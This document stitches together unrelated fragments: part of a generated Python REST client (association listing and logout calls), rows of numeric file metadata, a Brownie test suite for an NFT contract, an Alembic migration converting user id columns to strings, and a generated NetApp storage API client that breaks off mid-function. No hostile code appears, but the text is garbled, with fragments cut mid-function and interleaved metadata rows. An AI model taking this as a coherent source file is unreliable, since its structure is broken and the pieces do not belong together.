    :param str requester_id: requesterId can be user id OR email address. (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :return: VerveResponseAssociationList
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper always want just the data payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous path: hand back the request thread immediately.
        return self.get_associations_with_http_info(requester_id, client_token, **kwargs)
    # Synchronous path: unwrap and return the response data.
    response = self.get_associations_with_http_info(requester_id, client_token, **kwargs)
    return response
def get_associations_with_http_info(self, requester_id, client_token, **kwargs):
    """
    Get list of associations
    Return the list of association

    Synchronous by default; supply a `callback` callable to make the request
    asynchronously, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str requester_id: requesterId can be user id OR email address. (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :return: VerveResponseAssociationList
        If the method is called asynchronously,
        returns the request thread.
    """
    # Reject any keyword argument this endpoint does not understand.
    accepted_params = frozenset(
        ['requester_id', 'client_token', 'access_token',
         'callback', '_return_http_data_only'])
    params = {'requester_id': requester_id, 'client_token': client_token}
    for name, value in iteritems(kwargs):
        if name not in accepted_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_associations" % name
            )
        params[name] = value
    # Both positional parameters are mandatory and may not be None.
    if params.get('requester_id') is None:
        raise ValueError("Missing the required parameter `requester_id` when calling `get_associations`")
    if params.get('client_token') is None:
        raise ValueError("Missing the required parameter `client_token` when calling `get_associations`")
    resource_path = '/associations'.replace('{format}', 'json')
    # All request parameters travel as HTTP headers on this endpoint.
    header_params = {'requesterId': params['requester_id']}
    if 'access_token' in params:
        header_params['accessToken'] = params['access_token']
    header_params['clientToken'] = params['client_token']
    # Negotiate the response content type; omit Accept if nothing matched.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])
    return self.api_client.call_api(resource_path, 'GET',
                                    {},   # no path parameters
                                    {},   # no query parameters
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='VerveResponseAssociationList',
                                    auth_settings=['default'],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
def logout(self, requester_id, client_token, **kwargs):
    """
    Logout
    Logout rest api session. Returns true if successful

    Synchronous by default; supply a `callback` callable to make the request
    asynchronously, in which case the request thread is returned instead of
    the response data.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str requester_id: requesterId can be user id OR email address. (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :return: bool
        If the method is called asynchronously,
        returns the request thread.
    """
    # Callers of this convenience wrapper always want just the data payload.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous path: hand back the request thread immediately.
        return self.logout_with_http_info(requester_id, client_token, **kwargs)
    # Synchronous path: unwrap and return the response data.
    response = self.logout_with_http_info(requester_id, client_token, **kwargs)
    return response
def logout_with_http_info(self, requester_id, client_token, **kwargs):
    """
    Logout
    Logout rest api session. Returns true if successful

    Synchronous by default; supply a `callback` callable to make the request
    asynchronously, in which case the request thread is returned.

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param str requester_id: requesterId can be user id OR email address. (required)
    :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
    :param str access_token: Unique session token for user. To get access token user will have to authenticate
    :return: bool
        If the method is called asynchronously,
        returns the request thread.
    """
    # Reject any keyword argument this endpoint does not understand.
    accepted_params = frozenset(
        ['requester_id', 'client_token', 'access_token',
         'callback', '_return_http_data_only'])
    params = {'requester_id': requester_id, 'client_token': client_token}
    for name, value in iteritems(kwargs):
        if name not in accepted_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method logout" % name
            )
        params[name] = value
    # Both positional parameters are mandatory and may not be None.
    if params.get('requester_id') is None:
        raise ValueError("Missing the required parameter `requester_id` when calling `logout`")
    if params.get('client_token') is None:
        raise ValueError("Missing the required parameter `client_token` when calling `logout`")
    resource_path = '/logout'.replace('{format}', 'json')
    # All request parameters travel as HTTP headers on this endpoint.
    header_params = {'requesterId': params['requester_id']}
    if 'access_token' in params:
        header_params['accessToken'] = params['access_token']
    header_params['clientToken'] = params['client_token']
    # Negotiate the response content type; omit Accept if nothing matched.
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(
        ['application/json'])
    return self.api_client.call_api(resource_path, 'GET',
                                    {},   # no path parameters
                                    {},   # no query parameters
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='bool',
                                    auth_settings=['default'],
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'))
| 46.961612
| 186
| 0.60788
| 5,350
| 48,934
| 5.36486
| 0.052336
| 0.052122
| 0.032054
| 0.020068
| 0.915894
| 0.898021
| 0.880392
| 0.87088
| 0.862518
| 0.842798
| 0
| 0.000327
| 0.312462
| 48,934
| 1,041
| 187
| 47.006724
| 0.852782
| 0.372502
| 0
| 0.704453
| 0
| 0
| 0.215857
| 0.031148
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034413
| false
| 0.07085
| 0.01417
| 0
| 0.09919
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
7540ab0fc6570854286df8bd33c05728af89ec98
| 10,575
|
py
|
Python
|
tests/DreamFrames/test_dreamFramesNft.py
|
apguerrera/DreamFrames
|
ad6c7c081378f02010583dbdcb33e8ff112dd94b
|
[
"MIT"
] | 2
|
2020-06-09T02:12:21.000Z
|
2021-02-06T07:33:31.000Z
|
tests/DreamFrames/test_dreamFramesNft.py
|
apguerrera/DreamFrames
|
ad6c7c081378f02010583dbdcb33e8ff112dd94b
|
[
"MIT"
] | null | null | null |
tests/DreamFrames/test_dreamFramesNft.py
|
apguerrera/DreamFrames
|
ad6c7c081378f02010583dbdcb33e8ff112dd94b
|
[
"MIT"
] | 2
|
2019-05-01T01:53:42.000Z
|
2020-05-11T14:11:56.000Z
|
from brownie import accounts, web3, Wei, reverts
from brownie.network.transaction import TransactionReceipt
from brownie.convert import to_address
import pytest
from brownie import Contract
@pytest.fixture(autouse=True)
def isolation(fn_isolation):
    """Apply brownie's per-test chain isolation (snapshot/revert) to every test."""
    pass
""" def test_get_keys(dream_frames_nft):
holder = accounts[0]
_type = "DreamFrames"
dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[2])
print(dream_frames_nft.getKeys(token1)) """
def test_get_key(dream_frames_nft):
    """getKey returns the minted attribute keys by index; out-of-range yields ''."""
    owner = accounts[0]
    token_type = "DreamFrames"
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[0])
    dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[2])
    # (index, expected key); index 100 is past the end and must yield "".
    expected_keys = [
        (0, "type"),
        (1, "subtype"),
        (2, "name"),
        (3, "description"),
        (4, "tags"),
        (100, ""),
    ]
    for index, expected in expected_keys:
        assert dream_frames_nft.getKey(token1, index) == expected
def test_get_Value(dream_frames_nft):
    """getValue returns (timestamp, index, value) per key; unknown keys yield zeros.

    Cleanup: removed unused locals (DESCRIPTION_KEY, TAGS_KEY, _description,
    _tags) and the redundant re-assignment of _type.
    """
    holder = accounts[0]
    _type = "DreamFrames"
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
    dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[2])
    TYPE_KEY = "type"
    SUBTYPE_KEY = "subtype"
    NAME_KEY = "name"
    _subtype = "Dream"
    _name = "Goober"
    (timestamp, index, value) = dream_frames_nft.getValue(token1, TYPE_KEY)
    assert value == _type
    assert index == 0
    (timestamp, index, value) = dream_frames_nft.getValue(token1, SUBTYPE_KEY)
    assert value == _subtype
    assert index == 1
    (timestamp, index, value) = dream_frames_nft.getValue(token1, NAME_KEY)
    assert value == _name
    assert index == 2
    # Unknown key: the contract returns an all-empty/zero tuple.
    (timestamp, index, value) = dream_frames_nft.getValue(token1, "NO KEY")
    assert value == ""
    assert index == 0
    assert timestamp == 0
def _dream_frames_nft_mint(dream_frames_nft, _to, _type, minter):
    """Mint a token of `_type` to `_to` from `minter`; return (contract, token_id).

    Bug fix: the ownership assertion was hard-coded against accounts[0]
    instead of the actual recipient `_to`, so the helper could not be reused
    for other recipients.
    """
    _subtype = "Dream"
    _name = "Goober"
    _description = "Film token"
    _tags = "it is good token"
    token_id = dream_frames_nft.mint(
        _to, _type, _subtype, _name, _description, _tags,
        {"from": minter}).return_value
    # Verify the newly minted token belongs to the intended recipient.
    assert dream_frames_nft.ownerOf(token_id) == _to
    return dream_frames_nft, token_id
def test_dream_frames_nft_mint(dream_frames_nft):
    """Minting to the same recipient succeeds from different minter accounts."""
    recipient = accounts[0]
    token_type = "DreamFrames"
    for minter in (accounts[0], accounts[2]):
        _dream_frames_nft_mint(dream_frames_nft, recipient, token_type, minter)
def test_transfer_dream_frames_nft(dream_frames_nft):
    """A holder can approve and safe-transfer a minted token to another account."""
    owner = accounts[0]
    token_type = "DreamFrames"
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[0])
    dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[2])
    recipient = accounts[5]
    dream_frames_nft.approve(recipient, token1, {"from": owner})
    dream_frames_nft.safeTransferFrom(owner, recipient, token1, {"from": owner})
    assert dream_frames_nft.isOwnerOf(token1, recipient)
def test_attributes_by_mint(dream_frames_nft):
    """Minting populates the first attributes (type, subtype, name) in order."""
    owner = accounts[0]
    token_type = "DreamFrames"
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[0])
    dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[2])
    expected = [
        (0, "type", "DreamFrames"),
        (1, "subtype", "Dream"),
        (2, "name", "Goober"),
    ]
    for index, want_key, want_value in expected:
        (key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1, index)
        assert key == want_key
        assert value == want_value
def test_add_attributes(dream_frames_nft):
    """addAttribute appends a new key/value pair after the five minted defaults."""
    owner = accounts[0]
    token_type = "DreamFrames"
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[0])
    new_key = "rarity"
    new_value = "very rare"
    dream_frames_nft.addAttribute(token1, new_key, new_value, {"from": owner})
    # Mint seeds indices 0-4, so the added attribute lands at index 5.
    (key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1, 5)
    assert key == new_key
    assert value == new_value
def test_set_attribute(dream_frames_nft):
    """setAttribute fills in attributes on a token minted with only `type` set.

    Cleanup: removed the unused local TYPE_KEY.
    """
    holder = accounts[0]
    _type = "DreamFrames"
    _subtype = "Dream"
    _name = "Goober"
    _description = "Film token"
    _tags = "it is good token"
    SUBTYPE_KEY = "subtype"
    NAME_KEY = "name"
    DESCRIPTION_KEY = "description"
    TAGS_KEY = "tags"
    dream_frames_nft, token1 = _dream_frames_nft_without_all_attributes_mint(dream_frames_nft, holder, _type, accounts[0])
    dream_frames_nft.setAttribute(token1, SUBTYPE_KEY, _subtype)
    dream_frames_nft.setAttribute(token1, NAME_KEY, _name)
    dream_frames_nft.setAttribute(token1, DESCRIPTION_KEY, _description)
    dream_frames_nft.setAttribute(token1, TAGS_KEY, _tags)
    _index = 0
    (key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1, _index)
    assert key == "type"
    assert value == "DreamFrames"
    _index = 1
    (key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1, _index)
    assert key == "subtype"
    assert value == "Dream"
def test_update_attribute(dream_frames_nft):
    """updateAttribute overwrites existing keys; updating an unknown key reverts."""
    owner = accounts[0]
    token_type = "DreamFrames"
    new_subtype = "Channel"
    new_name = "Dream Movie"
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[0])
    dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[2])
    dream_frames_nft.updateAttribute(token1, "subtype", new_subtype, {"from": owner})
    dream_frames_nft.updateAttribute(token1, "name", new_name, {"from": owner})
    with reverts():
        dream_frames_nft.updateAttribute(token1, "NO TYPE", new_subtype, {"from": owner})
    for index, want_key, want_value in [(1, "subtype", "Channel"), (2, "name", "Dream Movie")]:
        (key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1, index)
        assert key == want_key
        assert value == want_value
def _dream_frames_nft_without_all_attributes_mint(dream_frames_nft, _to, _type, minter):
    """Mint a token with only `type` set (other attributes empty); return (contract, token_id).

    Bug fix: the ownership assertion was hard-coded against accounts[0]
    instead of the actual recipient `_to`.
    """
    token_id = dream_frames_nft.mint(_to, _type, "", "", "", "", {"from": minter}).return_value
    # Verify the newly minted token belongs to the intended recipient.
    assert dream_frames_nft.ownerOf(token_id) == _to
    return dream_frames_nft, token_id
def test_remove_attribute(dream_frames_nft):
    """removeAttribute deletes a regular key but reverts for the protected `type` key."""
    owner = accounts[0]
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, owner, "DreamFrames", accounts[0])
    dream_frames_nft.removeAttribute(token1, "name", {"from": owner})
    with reverts():
        # The `type` attribute is mandatory and cannot be removed.
        dream_frames_nft.removeAttribute(token1, "type", {"from": owner})
def test_secondary_account(dream_frames_nft):
    """A registered secondary account is treated as an owner of the token."""
    owner = accounts[0]
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, owner, "DreamFrames", accounts[0])
    secondary = accounts[9]
    dream_frames_nft.addSecondaryAccount(secondary, {"from": accounts[0]})
    assert dream_frames_nft.isOwnerOf(token1, secondary)
def test_remove_secondary_account(dream_frames_nft):
    """Removing a secondary account revokes its ownership rights.

    Idiom fix: `assert not x` instead of `assert x == False`.
    """
    holder = accounts[0]
    _type = "DreamFrames"
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
    secondaryAccount = accounts[9]
    dream_frames_nft.addSecondaryAccount(secondaryAccount, {"from": accounts[0]})
    assert dream_frames_nft.isOwnerOf(token1, secondaryAccount)
    dream_frames_nft.removeSecondaryAccount(secondaryAccount)
    assert not dream_frames_nft.isOwnerOf(token1, secondaryAccount)
def test_set_tokenURI(dream_frames_nft):
    """Only the token owner may set a token URI; non-owners revert and the URI persists."""
    owner = accounts[0]
    token_type = "DreamFrames"
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[0])
    dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, owner, token_type, accounts[2])
    dream_frames_nft.setTokenURI(token1, "https://something.com", {"from": accounts[0]})
    with reverts("DreamChannelNFT: set Token URI of token that is not own"):
        dream_frames_nft.setTokenURI(token1, "https://something.com", {"from": accounts[5]})
    assert dream_frames_nft.tokenURI(token1) == "https://something.com"
def test_set_baseURI(dream_frames_nft):
    """Owner can set the base URI (tokenURI = base + token id); non-owners revert.

    Cleanup: removed the unused local `uri`.
    """
    holder = accounts[0]
    _type = "DreamFrames"
    dream_frames_nft.setBaseURI("https://something.com/", {"from": accounts[0]})
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, holder, _type, accounts[0])
    assert dream_frames_nft.tokenURI(token1) == "https://something.com/1"
    with reverts("Owned: caller is not the owner"):
        dream_frames_nft.setBaseURI("https://something.com/", {"from": accounts[5]})
def test_burn(dream_frames_nft):
    """Only the contract owner may burn; a burned token's attributes read as empty."""
    recipient = accounts[0]
    token_type = "DreamFrames"
    dream_frames_nft, token1 = _dream_frames_nft_mint(dream_frames_nft, recipient, token_type, accounts[0])
    dream_frames_nft, token2 = _dream_frames_nft_mint(dream_frames_nft, recipient, token_type, accounts[2])
    with reverts():
        # A non-owner account cannot burn.
        dream_frames_nft.burn(token1, {"from": accounts[5]})
    dream_frames_nft.burn(token1, {"from": accounts[0]})
    with reverts():
        # The minter of token2 is not the contract owner either.
        dream_frames_nft.burn(token2, {"from": accounts[2]})
    dream_frames_nft.burn(token2, {"from": accounts[0]})
    (key, value, timestamp) = dream_frames_nft.getAttributeByIndex(token1, 1)
    assert key == ""
    assert value == ""
    assert timestamp == 0
| 32.240854
| 122
| 0.715366
| 1,355
| 10,575
| 5.178598
| 0.084133
| 0.228873
| 0.291293
| 0.094057
| 0.821861
| 0.772267
| 0.760581
| 0.727376
| 0.682913
| 0.610232
| 0
| 0.016657
| 0.176832
| 10,575
| 327
| 123
| 32.33945
| 0.789431
| 0
| 0
| 0.614679
| 0
| 0
| 0.082079
| 0
| 0
| 0
| 0
| 0
| 0.192661
| 1
| 0.077982
| false
| 0.004587
| 0.022936
| 0
| 0.110092
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
756261a113cf70d4c7ba12df8298dce33c992073
| 3,905
|
py
|
Python
|
alembic/versions/58c319e84d94_change_user_id_type_to_string.py
|
shvms/match-recommendation-service
|
fb6ec02772eaf4ea9c2fce7567d418cb65234b8b
|
[
"MIT"
] | 2
|
2021-06-09T20:50:25.000Z
|
2021-06-18T17:40:29.000Z
|
alembic/versions/58c319e84d94_change_user_id_type_to_string.py
|
shvms/match-recommendation-service
|
fb6ec02772eaf4ea9c2fce7567d418cb65234b8b
|
[
"MIT"
] | 9
|
2021-04-30T21:36:52.000Z
|
2021-05-23T18:39:59.000Z
|
alembic/versions/58c319e84d94_change_user_id_type_to_string.py
|
shvms/match-recommendation-service
|
fb6ec02772eaf4ea9c2fce7567d418cb65234b8b
|
[
"MIT"
] | 1
|
2021-04-27T15:35:54.000Z
|
2021-04-27T15:35:54.000Z
|
"""Change User id type to string
Revision ID: 58c319e84d94
Revises: a15b1085162f
Create Date: 2021-05-04 01:10:37.401748
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '58c319e84d94'        # id of this migration
down_revision = 'a15b1085162f'   # immediate parent migration
branch_labels = None
depends_on = None
def upgrade():
    """Widen user id columns from INTEGER to String and rebuild the foreign keys."""
    # ### commands auto generated by Alembic - please adjust! ###
    foreign_keys = [
        ("tracks_user_id_fkey", "tracks", "user_id"),
        ("musictaste_user_id_fkey", "musictaste", "user_id"),
        ("rightswipes_swiper_fkey", "rightswipes", "swiper"),
        ("rightswipes_swipee_fkey", "rightswipes", "swipee"),
    ]
    # Foreign keys must be dropped before the referenced column types change.
    for fk_name, table, _column in foreign_keys:
        op.drop_constraint(fk_name, table, type_='foreignkey')
    op.alter_column('users', 'id',
                    existing_type=sa.INTEGER(),
                    type_=sa.String(),
                    existing_nullable=False,
                    existing_server_default=sa.text("nextval('users_id_seq'::regclass)"))
    for table, column, nullable in [
        ('musictaste', 'user_id', True),
        ('rightswipes', 'swipee', False),
        ('rightswipes', 'swiper', False),
        ('tracks', 'user_id', True),
    ]:
        op.alter_column(table, column,
                        existing_type=sa.INTEGER(),
                        type_=sa.String(),
                        existing_nullable=nullable)
    # Recreate the foreign keys against the widened users.id column.
    for fk_name, table, column in foreign_keys:
        op.create_foreign_key(fk_name, table, "users", [column], ["id"], ondelete='CASCADE')
    # ### end Alembic commands ###
def downgrade():
    """Revert user id columns from String back to INTEGER and rebuild the foreign keys."""
    # ### commands auto generated by Alembic - please adjust! ###
    foreign_keys = [
        ("tracks_user_id_fkey", "tracks", "user_id"),
        ("musictaste_user_id_fkey", "musictaste", "user_id"),
        ("rightswipes_swiper_fkey", "rightswipes", "swiper"),
        ("rightswipes_swipee_fkey", "rightswipes", "swipee"),
    ]
    # Foreign keys must be dropped before the referenced column types change.
    for fk_name, table, _column in foreign_keys:
        op.drop_constraint(fk_name, table, type_='foreignkey')
    op.alter_column('users', 'id',
                    existing_type=sa.String(),
                    type_=sa.INTEGER(),
                    existing_nullable=False,
                    existing_server_default=sa.text("nextval('users_id_seq'::regclass)"))
    for table, column, nullable in [
        ('tracks', 'user_id', True),
        ('rightswipes', 'swiper', False),
        ('rightswipes', 'swipee', False),
        ('musictaste', 'user_id', True),
    ]:
        op.alter_column(table, column,
                        existing_type=sa.String(),
                        type_=sa.INTEGER(),
                        existing_nullable=nullable)
    # Recreate the foreign keys against the restored integer users.id column.
    for fk_name, table, column in foreign_keys:
        op.create_foreign_key(fk_name, table, "users", [column], ["id"], ondelete='CASCADE')
    # ### end Alembic commands ###
| 44.375
| 116
| 0.638156
| 430
| 3,905
| 5.490698
| 0.165116
| 0.050826
| 0.055061
| 0.060991
| 0.889454
| 0.889454
| 0.889454
| 0.889454
| 0.851334
| 0.837781
| 0
| 0.0182
| 0.212036
| 3,905
| 87
| 117
| 44.885057
| 0.749106
| 0.079898
| 0
| 0.878788
| 0
| 0
| 0.275591
| 0.096175
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030303
| false
| 0
| 0.030303
| 0
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
347675d375654f949d123e0e4e53978a7e589f48
| 193,946
|
py
|
Python
|
netapp/santricity/api/symbol/d_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 5
|
2016-08-23T17:52:22.000Z
|
2019-05-16T08:45:30.000Z
|
netapp/santricity/api/symbol/d_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 2
|
2016-11-10T05:30:21.000Z
|
2019-04-05T15:03:37.000Z
|
netapp/santricity/api/symbol/d_api.py
|
NetApp/santricity-webapi-pythonsdk
|
1d3df4a00561192f4cdcdd1890f4d27547ed2de2
|
[
"BSD-3-Clause-Clear"
] | 7
|
2016-08-25T16:11:44.000Z
|
2021-02-22T05:31:25.000Z
|
#!/usr/bin/env python
# coding: utf-8
"""
DApi.py
The Clear BSD License
Copyright (c) – 2016, NetApp, Inc. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted (subject to the limitations in the disclaimer below) provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of NetApp, Inc. nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from __future__ import absolute_import
import sys
import os
# python 2 and python 3 compatibility library
from six import iteritems
from ....santricity.configuration import Configuration
from ....santricity.api_client import ApiClient
class DApi(object):
def __init__(self, api_client=None):
    """Bind this API facade to `api_client`, or to the shared default client.

    When no client is supplied, the global Configuration's client is used,
    creating it (with the /devmgr/v2 context path) on first use.
    """
    config = Configuration()
    if not api_client:
        if not config.api_client:
            config.api_client = ApiClient(context_path='/devmgr/v2')
        api_client = config.api_client
    self.api_client = api_client
def symbol_deactivate_discrete_time_series(self, system_id, body, **kwargs):
    """Deactivate the discrete time series statistical streams.

    Documented SYMbol return codes: ok, error, illegalParam, invalidRequest.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param int body: A StatStreamId identifying the discrete time series to
        deactivate. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_deactivate_discrete_time_series" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_deactivate_discrete_time_series`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_deactivate_discrete_time_series`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deactivateDiscreteTimeSeries'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_deactivate_fibre_channel_check_point_based_async_mirroring(self, system_id, **kwargs):
    """Disable mirroring over Fibre Channel, freeing up the dedicated channel.

    Documented SYMbol return codes: ok, arvmAsyncMirrorGroupPresent.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_deactivate_fibre_channel_check_point_based_async_mirroring" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_deactivate_fibre_channel_check_point_based_async_mirroring`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deactivateFibreChannelCheckPointBasedAsyncMirroring'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_deactivate_histogram(self, system_id, body, **kwargs):
    """Deactivate a histogram statistics set, given a stream ID.

    Documented SYMbol return codes: ok, error, illegalParam, invalidRequest.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param int body: A StatStreamId identifying the histogram set to
        deactivate. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
